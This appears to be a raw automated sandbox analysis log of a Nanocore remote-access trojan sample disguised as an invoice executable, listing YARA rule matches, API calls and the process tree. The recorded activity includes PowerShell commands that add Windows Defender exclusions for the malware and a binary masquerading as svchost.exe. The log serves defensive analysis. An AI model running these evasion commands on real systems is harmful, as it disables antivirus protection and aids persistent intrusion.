        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engineClassification label: mal100.troj.evad.winEXE@50/24@7/4
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,3_2_00408FC9
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,4_2_00408FC9
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,3_2_004095FD
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,3_2_0040A33B
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00401306
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210225Jump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{883c2226-d991-4f34-8646-4dd2732a341c}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_01
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2016
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3Jump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: CN-Invoice-XXXXX9808-19011143287994.exeVirustotal: Detection: 29%
        Source: CN-Invoice-XXXXX9808-19011143287994.exeReversingLabs: Detection: 27%
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /SpecialRun 4101d8 6980
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
